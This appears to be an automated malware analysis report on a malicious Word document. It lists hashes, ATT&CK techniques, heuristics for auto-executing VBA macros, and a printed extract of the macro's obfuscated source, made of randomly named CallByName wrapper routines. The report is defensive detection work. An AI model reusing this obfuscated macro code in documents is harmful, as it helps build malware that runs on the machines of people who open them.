Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a978d66e095b959…

MALICIOUS

Office (OLE)

82.5 KB Created: 2016-05-12 23:30:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: 4fe5ff9f3237f24f6d6c053952fbae15 SHA-1: 30605f77b70d5892cd22828fb1be204d5c513956 SHA-256: 3a978d66e095b9593a72c67c263fe104950393c3db6db5725f0715b5854d2a4b
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document with detected VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro is designed to execute automatically upon opening the document, likely by using 'CreateObject' to launch a malicious payload. The presence of 'CallByName' calls further suggests dynamic execution of code.

Heuristics 6

  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
    CallByName xoqaDLo, qwJny, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1740 bytes
SHA-256: bd71e932ea238920aed8a831826d949264f1ec272a2ea065705c49afbc02b7f3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
39 of 61 identifiers look randomly generated (e.g. 'FnNC3zJ5JxoN2U') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SiovGt"
Private Sub ClDEAxxw(ByVal IMxuPR As Boolean, ByVal UBQIToI As Integer)
QzYClH "FnNC3zJ5JxoN2U", 8941, "rCG482M5g"
End Sub
Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
CallByName xoqaDLo, qwJny, 1
End Sub
Public Sub uLMdQEzSM(ByVal EHhZvkvY As Variant, ByVal sZbhA As String, ByVal nQJGcyJuxH As Variant, ByVal loEiPnFEA As Object, ByVal quuPFeRPwX As Variant)
IXNhTW = "l2VZR9nD2"
CallByName loEiPnFEA, sZbhA, 1, EHhZvkvY, nQJGcyJuxH, quuPFeRPwX
End Sub
Public Function kHJDvJ(ByVal nYiINdSYPo As String, ByVal QimeyGm As Object, ByVal kKdMPKx As String) As Variant
Dim VmKBS As Integer, bAmMXC As Integer
Set kHJDvJ = CallByName(QimeyGm, nYiINdSYPo, 2, kKdMPKx)
End Function
Public Sub QavSmHwAdE(ByVal kXMXvgXM As Variant, ByVal UihLPcbp As String, ByVal LbRDnPIz As Integer, ByVal zwuHQkbdv As Variant, ByVal AvKZEdLCKg As String, ByVal ZdFxP As Object)
CallByName ZdFxP, UihLPcbp, 1, kXMXvgXM, zwuHQkbdv
End Sub
Public Sub HQvScqTefi(ByVal OnIWlzab As Boolean, ByVal Jmipofj As Variant, ByVal bNiRsuvF As Object, ByVal jXGWtA As String)
CallByName bNiRsuvF, jXGWtA, 4, Jmipofj
End Sub
Private Sub jIAMbLT(ByVal AEwBfCTeA As Integer, ByVal vOPGfq As Integer)
VYZRTX "PMlVAnnZYb"
FaPULoVT 5592, "iL2G7ATQq9s", "6nCQR9WtSsb"
End Sub
Public Sub lITquzHn(ByVal NIuVH As String, ByVal DGnrbz As Object, ByVal ltxCfvQYK As Integer, ByVal MWKWM As Variant, ByVal vvSEm As String)
CallByName DGnrbz, vvSEm, 1, MWKWM
End Sub
Public Function JvWgrglen(ByVal xfQxkqo As String, ByVal afGcAxt As String, ByVal dJYFud As Object) As Variant
Dim FzqRXM As Integer, UNYDxtaaT As Boolean
JvWgrglen = CallByName(dJYFud, afGcAxt, 2)
End Function